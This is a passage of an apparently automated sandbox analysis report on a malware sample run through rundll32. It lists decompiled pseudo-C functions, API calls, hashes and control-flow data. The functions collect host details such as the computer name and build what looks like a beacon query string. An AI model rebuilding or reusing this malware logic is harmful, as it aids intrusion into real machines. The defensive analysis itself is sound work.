                                          				if( *0x47bd24c >= 5) {
                                          					if(RtlAllocateHeap() == 0) {
                                          						L6:
                                          						_t31 = 8;
                                          						L7:
                                          						if(_t31 != 0) {
                                          							L10:
                                          							 *0x47bd24c =  *0x47bd24c + 1;
                                          							L11:
                                          							return _t31;
                                          						}
                                          						_t46 = _a4;
                                          						_t41 = _v8;
                                          						 *_a16 = _a4;
                                          						 *_a20 = E047B7CF7(_a4, _t41);
                                          						_t19 = E047B60CF(_t41, _t41, _t46);
                                          						if(_t19 != 0) {
                                          							 *_a8 = _t41;
                                          							 *_a12 = _t19;
                                          							if( *0x47bd24c < 5) {
                                          								 *0x47bd24c =  *0x47bd24c & 0x00000000;
                                          							}
                                          							goto L11;
                                          						}
                                          						_t31 = 0xbf;
                                          						E047B6106();
                                          						HeapFree( *0x47bd238, 0, _t41);
                                          						goto L10;
                                          					}
                                          					_t25 = E047B514F(_a4, _t33, _t37, _t44,  &_v8,  &_a4, _t14);
                                          					L5:
                                          					_t31 = _t25;
                                          					goto L7;
                                          				}
                                          				if(RtlAllocateHeap() == 0) {
                                          					goto L6;
                                          				}
                                          				_t25 = E047B1754(_a4, _t33, _t37, _t44,  &_v8,  &_a4, _t26); // executed
                                          				goto L5;
                                          			}













                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 047B9F3B
                                            • Part of subcall function 047B1754: GetTickCount.KERNEL32 ref: 047B1768
                                            • Part of subcall function 047B1754: wsprintfA.USER32 ref: 047B17B8
                                            • Part of subcall function 047B1754: wsprintfA.USER32 ref: 047B17D5
                                            • Part of subcall function 047B1754: wsprintfA.USER32 ref: 047B1801
                                            • Part of subcall function 047B1754: HeapFree.KERNEL32(00000000,?), ref: 047B1813
                                            • Part of subcall function 047B1754: wsprintfA.USER32 ref: 047B1834
                                            • Part of subcall function 047B1754: HeapFree.KERNEL32(00000000,?), ref: 047B1844
                                            • Part of subcall function 047B1754: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 047B1872
                                            • Part of subcall function 047B1754: GetTickCount.KERNEL32 ref: 047B1883
                                          • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 047B9F59
                                          • HeapFree.KERNEL32(00000000,?,?,?,047B9C62,00000002,?,?,?,?), ref: 047B9FB6
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$wsprintf$AllocateFree$CountTick
                                          • String ID:
                                          • API String ID: 1676223858-0
                                          • Opcode ID: 5c0472ce3327dddcca5e84d44ecb32f1351b2346b2788cf400d3b5ba5c9d9e24
                                          • Instruction ID: 91e1c54c35b7b35ce16b596862dd333724fa1f21b3e797c4103e1046e7025d64
                                          • Opcode Fuzzy Hash: 5c0472ce3327dddcca5e84d44ecb32f1351b2346b2788cf400d3b5ba5c9d9e24
                                          • Instruction Fuzzy Hash: 9C2136B5200209AFEB119F69D844FDA37ACEF48354F10842AFB569B340EB74F9459BE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 399 47b642c-47b6452 401 47b6458-47b646c call 47b4ffa 399->401 402 47b6520-47b6526 399->402 404 47b6471-47b6475 401->404 405 47b647b-47b6480 404->405 406 47b6517-47b651c 404->406 407 47b6498-47b649a 405->407 408 47b6482-47b6485 405->408 406->402 407->406 410 47b649c-47b64c2 407->410 408->407 409 47b6487-47b6496 408->409 409->407 413 47b64f0-47b64f5 410->413 414 47b64c4-47b64d0 call 47b5103 410->414 415 47b64fd-47b6506 413->415 416 47b64f7-47b64f9 413->416 414->413 421 47b64d2-47b64d7 414->421 419 47b6508-47b650b SysFreeString 415->419 420 47b650d-47b6510 415->420 416->415 419->420 420->406 422 47b6512-47b6515 SysFreeString 420->422 421->413 423 47b64d9-47b64dc 421->423 422->406 423->413 424 47b64de-47b64ee 423->424 424->413
                                          C-Code - Quality: 75%
                                          			E047B642C(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                          				void* _v8;
                                          				void* __esi;
                                          				intOrPtr* _t35;
                                          				void* _t40;
                                          				intOrPtr* _t41;
                                          				intOrPtr* _t43;
                                          				intOrPtr* _t45;
                                          				intOrPtr* _t50;
                                          				intOrPtr* _t52;
                                          				void* _t54;
                                          				intOrPtr* _t55;
                                          				intOrPtr* _t57;
                                          				intOrPtr* _t61;
                                          				intOrPtr* _t65;
                                          				intOrPtr _t68;
                                          				void* _t72;
                                          				void* _t75;
                                          				void* _t76;
                                          
                                          				_t55 = _a4;
                                          				_t35 =  *((intOrPtr*)(_t55 + 4));
                                          				_a4 = 0;
                                          				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                          				if(_t76 < 0) {
                                          					L18:
                                          					return _t76;
                                          				}
                                          				_t40 = E047B4FFA(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                                          				_t76 = _t40;
                                          				if(_t76 >= 0) {
                                          					_t61 = _a28;
                                          					if(_t61 != 0 &&  *_t61 != 0) {
                                          						_t52 = _v8;
                                          						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                          					}
                                          					if(_t76 >= 0) {
                                          						_t43 =  *_t55;
                                          						_t68 =  *0x47bd2a4; // 0x24fa5a8
                                          						_t20 = _t68 + 0x47be1fc; // 0x740053
                                          						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                          						if(_t76 >= 0) {
                                          							_t76 = E047B5103(_a4);
                                          							if(_t76 >= 0) {
                                          								_t65 = _a28;
                                          								if(_t65 != 0 &&  *_t65 == 0) {
                                          									_t50 = _a4;
                                          									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                          								}
                                          							}
                                          						}
                                          						_t45 = _a4;
                                          						if(_t45 != 0) {
                                          							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                          						}
                                          						_t57 = __imp__#6;
                                          						if(_a20 != 0) {
                                          							 *_t57(_a20);
                                          						}
                                          						if(_a12 != 0) {
                                          							 *_t57(_a12);
                                          						}
                                          					}
                                          				}
                                          				_t41 = _v8;
                                          				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                          				goto L18;
                                          			}






















                                          APIs
                                            • Part of subcall function 047B4FFA: SysAllocString.OLEAUT32(80000002), ref: 047B5057
                                            • Part of subcall function 047B4FFA: SysFreeString.OLEAUT32(00000000), ref: 047B50BD
                                          • SysFreeString.OLEAUT32(?), ref: 047B650B
                                          • SysFreeString.OLEAUT32(047BA6F4), ref: 047B6515
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$Free$Alloc
                                          • String ID:
                                          • API String ID: 986138563-0
                                          • Opcode ID: 7b1f589935c3220ede4f40cb070c6cc2b043498c1daea00b1535c7c8cfd5381e
                                          • Instruction ID: cf3e76378d17c7b3b5eb89a92e45a8543787fbb27088d4d6298f46ce8c06419d
                                          • Opcode Fuzzy Hash: 7b1f589935c3220ede4f40cb070c6cc2b043498c1daea00b1535c7c8cfd5381e
                                          • Instruction Fuzzy Hash: 50314872500159AFCB21DFA8C888DDBBB79FFC97447148658FA459B214E231ED51CBE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                          			E047B73E9(void* __ecx) {
                                          				signed int _v8;
                                          				void* _t15;
                                          				void* _t19;
                                          				void* _t20;
                                          				void* _t22;
                                          				intOrPtr* _t23;
                                          
                                          				_t23 = __imp__;
                                          				_t20 = 0;
                                          				_v8 = _v8 & 0;
                                          				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                                          				_t10 = _v8;
                                          				if(_v8 != 0) {
                                          					_t20 = E047B58BE(_t10 + 1);
                                          					if(_t20 != 0) {
                                          						_t15 =  *_t23(3, _t20,  &_v8); // executed
                                          						if(_t15 != 0) {
                                          							 *((char*)(_v8 + _t20)) = 0;
                                          						} else {
                                          							E047B147E(_t20);
                                          							_t20 = 0;
                                          						}
                                          					}
                                          				}
                                          				return _t20;
                                          			}










                                          APIs
                                          • GetComputerNameExA.KERNEL32(00000003,00000000,047B51DC,7519F710,00000000,?,?,047B51DC), ref: 047B7401
                                            • Part of subcall function 047B58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,047B1C51), ref: 047B58CA
                                          • GetComputerNameExA.KERNEL32(00000003,00000000,047B51DC,047B51DD,?,?,047B51DC), ref: 047B741E
                                            • Part of subcall function 047B147E: HeapFree.KERNEL32(00000000,00000000,047B1D11,00000000,?,?,-00000008), ref: 047B148A
                                          Similarity
                                          • API ID: ComputerHeapName$AllocateFree
                                          • String ID:
                                          • API String ID: 187446995-0
                                          • Opcode ID: 221023657a8ec51f0070966e6340bfb6614da438143340249cb2eb4540cd2d44
                                          • Instruction ID: 821c4b61148db2c1c9bb04ab278e1c43fe3163ce40376c44467a2e1bbfa9b4da
                                          • Opcode Fuzzy Hash: 221023657a8ec51f0070966e6340bfb6614da438143340249cb2eb4540cd2d44
                                          • Instruction Fuzzy Hash: 7BF0B426600109BAE711DABA8D04FEF7BBCDBC4681F210069A944D3300EA74EF0187F0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 34%
                                          			E047B7BA9(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                          				intOrPtr _v12;
                                          				void* _v18;
                                          				char _v20;
                                          				intOrPtr _t15;
                                          				void* _t17;
                                          				intOrPtr _t19;
                                          				void* _t23;
                                          
                                          				_v20 = 0;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosw");
                                          				_t15 =  *0x47bd2a4; // 0x24fa5a8
                                          				_t4 = _t15 + 0x47be39c; // 0x6cb8944
                                          				_t20 = _t4;
                                          				_t6 = _t15 + 0x47be124; // 0x650047
                                          				_t17 = E047B642C(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                                          				if(_t17 < 0) {
                                          					_t23 = _t17;
                                          				} else {
                                          					_t23 = 8;
                                          					if(_v20 != _t23) {
                                          						_t23 = 1;
                                          					} else {
                                          						_t19 = E047B4CD3(_t20, _v12);
                                          						if(_t19 != 0) {
                                          							 *_a16 = _t19;
                                          							_t23 = 0;
                                          						}
                                          						__imp__#6(_v12);
                                          					}
                                          				}
                                          				return _t23;
                                          			}











                                          APIs
                                            • Part of subcall function 047B642C: SysFreeString.OLEAUT32(?), ref: 047B650B
                                            • Part of subcall function 047B4CD3: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,047B358E,004F0053,00000000,?), ref: 047B4CDC
                                            • Part of subcall function 047B4CD3: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,047B358E,004F0053,00000000,?), ref: 047B4D06
                                            • Part of subcall function 047B4CD3: memset.NTDLL ref: 047B4D1A
                                          • SysFreeString.OLEAUT32(00000000), ref: 047B7C0C
                                          Similarity
                                          • API ID: FreeString$lstrlenmemcpymemset
                                          • String ID:
                                          • API String ID: 397948122-0
                                          • Opcode ID: 21073a80185a1b30a8abfd8bae3866dc17084a3d2115ed9196a74734ac531ef9
                                          • Instruction ID: e8ad7242c4140cda523fcae07a7a9eab314fa0399b8479fe02931f950cf005eb
                                          • Opcode Fuzzy Hash: 21073a80185a1b30a8abfd8bae3866dc17084a3d2115ed9196a74734ac531ef9
                                          • Instruction Fuzzy Hash: B201BC3250051ABFDB169FA8CD04FEBBBBCEB44610F004429EA45E7221E371EA56CBD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 70%
                                          			E047B9347(void* __ecx, signed char* _a4) {
                                          				void* _v8;
                                          				void* _t8;
                                          				signed short _t11;
                                          				signed int _t12;
                                          				signed int _t14;
                                          				intOrPtr _t15;
                                          				void* _t19;
                                          				signed short* _t22;
                                          				void* _t24;
                                          				intOrPtr* _t27;
                                          
                                          				_t24 = 0;
                                          				_push(0);
                                          				_t19 = 1;
                                          				_t27 = 0x47bd330;
                                          				E047B684E();
                                          				while(1) {
                                          					_t8 = E047B32BA(_a4,  &_v8); // executed
                                          					if(_t8 == 0) {
                                          						break;
                                          					}
                                          					_push(_v8);
                                          					_t14 = 0xd;
                                          					_t15 = E047BA5E9(_t14);
                                          					if(_t15 == 0) {
                                          						HeapFree( *0x47bd238, 0, _v8);
                                          						break;
                                          					} else {
                                          						 *_t27 = _t15;
                                          						_t27 = _t27 + 4;
                                          						_t24 = _t24 + 1;
                                          						if(_t24 < 3) {
                                          							continue;
                                          						} else {
                                          						}
                                          					}
                                          					L7:
                                          					_push(1);
                                          					E047B684E();
                                          					if(_t19 != 0) {
                                          						_t22 =  *0x47bd338; // 0x6cb9b58
                                          						_t11 =  *_t22 & 0x0000ffff;
                                          						if(_t11 < 0x61 || _t11 > 0x7a) {
                                          							_t12 = _t11 & 0x0000ffff;
                                          						} else {
                                          							_t12 = (_t11 & 0x0000ffff) - 0x20;
                                          						}
                                          						 *_t22 = _t12;
                                          					}
                                          					return _t19;
                                          				}
                                          				_t19 = 0;
                                          				goto L7;
                                          			}














                                          APIs
                                            • Part of subcall function 047B684E: GetProcAddress.KERNEL32(36776F57,047B935F), ref: 047B6869
                                            • Part of subcall function 047B32BA: RtlAllocateHeap.NTDLL(00000000,59935A40,00000000), ref: 047B32E5
                                            • Part of subcall function 047B32BA: RtlAllocateHeap.NTDLL(00000000,59935A40), ref: 047B3307
                                            • Part of subcall function 047B32BA: memset.NTDLL ref: 047B3321
                                            • Part of subcall function 047B32BA: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 047B335F
                                            • Part of subcall function 047B32BA: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 047B3373
                                            • Part of subcall function 047B32BA: FindCloseChangeNotification.KERNEL32(00000000), ref: 047B338A
                                            • Part of subcall function 047B32BA: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 047B3396
                                            • Part of subcall function 047B32BA: lstrcat.KERNEL32(?,642E2A5C), ref: 047B33D7
                                            • Part of subcall function 047B32BA: FindFirstFileA.KERNEL32(?,?), ref: 047B33ED
                                            • Part of subcall function 047BA5E9: lstrlen.KERNEL32(?,00000000,047BD330,00000001,047B937A,047BD00C,047BD00C,00000000,00000005,00000000,00000000,?,?,?,047B207E,?), ref: 047BA5F2
                                            • Part of subcall function 047BA5E9: mbstowcs.NTDLL ref: 047BA619
                                            • Part of subcall function 047BA5E9: memset.NTDLL ref: 047BA62B
                                          • HeapFree.KERNEL32(00000000,047BD00C,047BD00C,047BD00C,00000000,00000005,00000000,00000000,?,?,?,047B207E,?,047BD00C,?,?), ref: 047B9396
                                          Similarity
                                          • API ID: FileHeap$AllocateFindmemset$AddressChangeCloseCreateFirstFreeNotificationProcTimelstrcatlstrlenmbstowcs
                                          • String ID:
                                          • API String ID: 983081259-0
                                          • Opcode ID: 3217b3d08aa7c0172f2780b524ef466e401e61e3152374cb11704adcb8e048c5
                                          • Instruction ID: bc24cfaef6b3572d8f94a8d2854d4c9f5c186eea17cdf2f582b4f39e72f155cb
                                          • Opcode Fuzzy Hash: 3217b3d08aa7c0172f2780b524ef466e401e61e3152374cb11704adcb8e048c5
                                          • Instruction Fuzzy Hash: B501F5F1200305AEF7105EA6CD84BEABBA9EB44364B140035FBD5C72A0D6A4BD8153E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E047B1B13(void** __edi, intOrPtr _a4, unsigned int _a8, void* _a12) {
                                          				void* _t15;
                                          				void* _t21;
                                          				signed int _t23;
                                          				void* _t26;
                                          
                                          				if(_a4 != 0) {
                                          					_t15 = E047B7BA9(_a4, _a8, _a12, __edi); // executed
                                          					_t26 = _t15;
                                          				} else {
                                          					_t26 = E047B74B9(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
                                          					if(_t26 == 0) {
                                          						_t23 = _a8 >> 1;
                                          						if(_t23 == 0) {
                                          							_t26 = 2;
                                          							HeapFree( *0x47bd238, 0, _a12);
                                          						} else {
                                          							_t21 = _a12;
                                          							 *((short*)(_t21 + _t23 * 2 - 2)) = 0;
                                          							 *__edi = _t21;
                                          						}
                                          					}
                                          				}
                                          				return _t26;
                                          			}








                                          APIs
                                          • HeapFree.KERNEL32(00000000,?,00000000,80000002,7519F710,?,?,7519F710,00000000,?,047B690C,?,004F0053,06CB9388,00000000,?), ref: 047B1B60
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: d62a42bad1f7b72fd8dac0abb220ff3eba27a3e85c3d3bbf297f9b2d1148c355
                                          • Instruction ID: 39f587bc9ce85a683655f26dbd3bd0c7307735a65cd7674e02d38036430718b0
                                          • Opcode Fuzzy Hash: d62a42bad1f7b72fd8dac0abb220ff3eba27a3e85c3d3bbf297f9b2d1148c355
                                          • Instruction Fuzzy Hash: 2A016232100209FBDB229F95DC15FEB7B69EF443A0F448419FA599A260E730A920DBD0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          C-Code - Quality: 66%
                                          			E047B514F(long __eax, void* __ecx, void* __edx, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
                                          				intOrPtr _v0;
                                          				intOrPtr _v4;
                                          				intOrPtr _v20;
                                          				intOrPtr _v28;
                                          				intOrPtr _v32;
                                          				void* _v48;
                                          				intOrPtr _v56;
                                          				void* __edi;
                                          				long _t26;
                                          				intOrPtr _t27;
                                          				intOrPtr _t28;
                                          				intOrPtr _t29;
                                          				intOrPtr _t30;
                                          				intOrPtr _t31;
                                          				void* _t34;
                                          				intOrPtr _t35;
                                          				int _t38;
                                          				intOrPtr _t43;
                                          				intOrPtr _t44;
                                          				intOrPtr _t51;
                                          				intOrPtr _t55;
                                          				intOrPtr* _t57;
                                          				intOrPtr _t63;
                                          				intOrPtr _t65;
                                          				intOrPtr _t71;
                                          				intOrPtr _t74;
                                          				intOrPtr _t77;
                                          				int _t80;
                                          				intOrPtr _t81;
                                          				int _t84;
                                          				intOrPtr _t86;
                                          				int _t89;
                                          				intOrPtr* _t92;
                                          				intOrPtr* _t93;
                                          				void* _t94;
                                          				void* _t98;
                                          				void* _t99;
                                          				void* _t100;
                                          				intOrPtr _t101;
                                          				void* _t103;
                                          				int _t104;
                                          				void* _t105;
                                          				void* _t106;
                                          				void* _t108;
                                          				void* _t109;
                                          				void* _t111;
                                          
                                          				_t98 = __edx;
                                          				_t94 = __ecx;
                                          				_t26 = __eax;
                                          				_t108 = _a16;
                                          				_v4 = 8;
                                          				if(__eax == 0) {
                                          					_t26 = GetTickCount();
                                          				}
                                          				_t27 =  *0x47bd018; // 0x3df0b315
                                          				asm("bswap eax");
                                          				_t28 =  *0x47bd014; // 0x3a87c8cd
                                          				asm("bswap eax");
                                          				_t29 =  *0x47bd010; // 0xd8d2f808
                                          				asm("bswap eax");
                                          				_t30 =  *0x47bd00c; // 0x8f8f86c2
                                          				asm("bswap eax");
                                          				_t31 =  *0x47bd2a4; // 0x24fa5a8
                                          				_t3 = _t31 + 0x47be633; // 0x74666f73
                                          				_t104 = wsprintfA(_t108, _t3, 2, 0x3d137, _t30, _t29, _t28, _t27,  *0x47bd02c,  *0x47bd004, _t26);
                                          				_t34 = E047B57AB();
                                          				_t35 =  *0x47bd2a4; // 0x24fa5a8
                                          				_t4 = _t35 + 0x47be673; // 0x74707526
                                          				_t38 = wsprintfA(_t104 + _t108, _t4, _t34);
                                          				_t111 = _t109 + 0x38;
                                          				_t105 = _t104 + _t38;
                                          				_t99 = E047B73E9(_t94);
                                          				if(_t99 != 0) {
                                          					_t86 =  *0x47bd2a4; // 0x24fa5a8
                                          					_t6 = _t86 + 0x47be8cb; // 0x736e6426
                                          					_t89 = wsprintfA(_t105 + _t108, _t6, _t99);
                                          					_t111 = _t111 + 0xc;
                                          					_t105 = _t105 + _t89;
                                          					HeapFree( *0x47bd238, 0, _t99);
                                          				}
                                          				_t100 = E047B614A();
                                          				if(_t100 != 0) {
                                          					_t81 =  *0x47bd2a4; // 0x24fa5a8
                                          					_t8 = _t81 + 0x47be8d3; // 0x6f687726
                                          					_t84 = wsprintfA(_t105 + _t108, _t8, _t100);
                                          					_t111 = _t111 + 0xc;
                                          					_t105 = _t105 + _t84;
                                          					HeapFree( *0x47bd238, 0, _t100);
                                          				}
                                          				_t101 =  *0x47bd324; // 0x6cb95b0
                                          				_a32 = E047B757B(0x47bd00a, _t101 + 4);
                                          				_t43 =  *0x47bd2cc; // 0x0
                                          				if(_t43 != 0) {
                                          					_t77 =  *0x47bd2a4; // 0x24fa5a8
                                          					_t11 = _t77 + 0x47be8ad; // 0x3d736f26
                                          					_t80 = wsprintfA(_t105 + _t108, _t11, _t43);
                                          					_t111 = _t111 + 0xc;
                                          					_t105 = _t105 + _t80;
                                          				}
                                          				_t44 =  *0x47bd2c8; // 0x0
                                          				if(_t44 != 0) {
                                          					_t74 =  *0x47bd2a4; // 0x24fa5a8
                                          					_t13 = _t74 + 0x47be8a6; // 0x3d706926
                                          					wsprintfA(_t105 + _t108, _t13, _t44);
                                          				}
                                          				if(_a32 != 0) {
                                          					_t103 = RtlAllocateHeap( *0x47bd238, 0, 0x800);
                                          					if(_t103 != 0) {
                                          						E047B749F(GetTickCount());
                                          						_t51 =  *0x47bd324; // 0x6cb95b0
                                          						__imp__(_t51 + 0x40);
                                          						asm("lock xadd [eax], ecx");
                                          						_t55 =  *0x47bd324; // 0x6cb95b0
                                          						__imp__(_t55 + 0x40);
                                          						_t57 =  *0x47bd324; // 0x6cb95b0
                                          						_t106 = E047B4D2C(1, _t98, _t108,  *_t57);
                                          						asm("lock xadd [eax], ecx");
                                          						if(_t106 != 0) {
                                          							StrTrimA(_t106, 0x47bc294);
                                          							_t63 =  *0x47bd2a4; // 0x24fa5a8
                                          							_push(_t106);
                                          							_t15 = _t63 + 0x47be252; // 0x616d692f
                                          							_t65 = E047B9DEF(_t15);
                                          							_v20 = _t65;
                                          							if(_t65 != 0) {
                                          								_t92 = __imp__;
                                          								 *_t92(_t106, _v4);
                                          								 *_t92(_t103, _v0);
                                          								_t93 = __imp__;
                                          								 *_t93(_t103, _v32);
                                          								 *_t93(_t103, _t106);
                                          								_t71 = E047B666E(0xffffffffffffffff, _t103, _v32, _v28);
                                          								_v56 = _t71;
                                          								if(_t71 != 0 && _t71 != 0x10d2) {
                                          									E047B6106();
                                          								}
                                          								HeapFree( *0x47bd238, 0, _v48);
                                          							}
                                          							HeapFree( *0x47bd238, 0, _t106);
                                          						}
                                          						HeapFree( *0x47bd238, 0, _t103);
                                          					}
                                          					HeapFree( *0x47bd238, 0, _a24);
                                          				}
                                          				HeapFree( *0x47bd238, 0, _t108);
                                          				return _a12;
                                          			}

                                          APIs
                                          • GetTickCount.KERNEL32 ref: 047B5166
                                          • wsprintfA.USER32 ref: 047B51B3
                                          • wsprintfA.USER32 ref: 047B51D0
                                          • wsprintfA.USER32 ref: 047B51F3
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 047B5203
                                          • wsprintfA.USER32 ref: 047B5225
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 047B5235
                                          • wsprintfA.USER32 ref: 047B526C
                                          • wsprintfA.USER32 ref: 047B528C
                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 047B52A9
                                          • GetTickCount.KERNEL32 ref: 047B52B9
                                          • RtlEnterCriticalSection.NTDLL(06CB9570), ref: 047B52CD
                                          • RtlLeaveCriticalSection.NTDLL(06CB9570), ref: 047B52EB
                                            • Part of subcall function 047B4D2C: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,047B52FE,?,06CB95B0), ref: 047B4D57
                                            • Part of subcall function 047B4D2C: lstrlen.KERNEL32(?,?,?,047B52FE,?,06CB95B0), ref: 047B4D5F
                                            • Part of subcall function 047B4D2C: strcpy.NTDLL ref: 047B4D76
                                            • Part of subcall function 047B4D2C: lstrcat.KERNEL32(00000000,?), ref: 047B4D81
                                            • Part of subcall function 047B4D2C: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,047B52FE,?,06CB95B0), ref: 047B4D9E
                                          • StrTrimA.SHLWAPI(00000000,047BC294,?,06CB95B0), ref: 047B531D
                                            • Part of subcall function 047B9DEF: lstrlen.KERNEL32(?,00000000,00000000,047B5335,616D692F,00000000), ref: 047B9DFB
                                            • Part of subcall function 047B9DEF: lstrlen.KERNEL32(?), ref: 047B9E03
                                            • Part of subcall function 047B9DEF: lstrcpy.KERNEL32(00000000,?), ref: 047B9E1A
                                            • Part of subcall function 047B9DEF: lstrcat.KERNEL32(00000000,?), ref: 047B9E25
                                          • lstrcpy.KERNEL32(00000000,?), ref: 047B5348
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 047B534F
                                          • lstrcat.KERNEL32(00000000,?), ref: 047B535C
                                          • lstrcat.KERNEL32(00000000,00000000), ref: 047B5360
                                            • Part of subcall function 047B666E: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,751881D0), ref: 047B6720
                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 047B5390
                                          • HeapFree.KERNEL32(00000000,00000000,616D692F,00000000), ref: 047B539F
                                          • HeapFree.KERNEL32(00000000,00000000,?,06CB95B0), ref: 047B53AE
                                          • HeapFree.KERNEL32(00000000,00000000), ref: 047B53C0
                                          • HeapFree.KERNEL32(00000000,?), ref: 047B53CF
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                          • String ID:
                                          • API String ID: 3080378247-0
                                          • Opcode ID: defe69b17af04b33355b14251b2b26f93cae65015e869f984fe6433b6c64cddf
                                          • Instruction ID: f0763d5ea03fb37758bd8fe41748cf4813ca7a401e3614b18d26d9a63bb9725e
                                          • Opcode Fuzzy Hash: defe69b17af04b33355b14251b2b26f93cae65015e869f984fe6433b6c64cddf
                                          • Instruction Fuzzy Hash: B3619D71500605AFE721ABA4ED48FD677E8EB48318F058528F948DB350E73CED069BE5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 51%
                                          			E047BADA5(long _a4, long _a8) {
                                          				signed int _v8;
                                          				intOrPtr _v16;
                                          				LONG* _v28;
                                          				long _v40;
                                          				long _v44;
                                          				long _v48;
                                          				CHAR* _v52;
                                          				long _v56;
                                          				CHAR* _v60;
                                          				long _v64;
                                          				signed int* _v68;
                                          				char _v72;
                                          				signed int _t76;
                                          				signed int _t80;
                                          				signed int _t81;
                                          				intOrPtr* _t82;
                                          				intOrPtr* _t83;
                                          				intOrPtr* _t85;
                                          				intOrPtr* _t90;
                                          				intOrPtr* _t95;
                                          				intOrPtr* _t98;
                                          				void* _t102;
                                          				intOrPtr* _t104;
                                          				void* _t115;
                                          				long _t116;
                                          				void _t125;
                                          				void* _t131;
                                          				signed short _t133;
                                          				struct HINSTANCE__* _t138;
                                          				signed int* _t139;
                                          
                                          				_t139 = _a4;
                                          				_v28 = _t139[2] + 0x47b0000;
                                          				_t115 = _t139[3] + 0x47b0000;
                                          				_t131 = _t139[4] + 0x47b0000;
                                          				_v8 = _t139[7];
                                          				_v60 = _t139[1] + 0x47b0000;
                                          				_v16 = _t139[5] + 0x47b0000;
                                          				_v64 = _a8;
                                          				_v72 = 0x24;
                                          				_v68 = _t139;
                                          				_v56 = 0;
                                          				asm("stosd");
                                          				_v48 = 0;
                                          				_v44 = 0;
                                          				_v40 = 0;
                                          				if(( *_t139 & 0x00000001) == 0) {
                                          					_a8 =  &_v72;
                                          					RaiseException(0xc06d0057, 0, 1,  &_a8);
                                          					return 0;
                                          				}
                                          				_t138 =  *_v28;
                                          				_t76 = _a8 - _t115 >> 2 << 2;
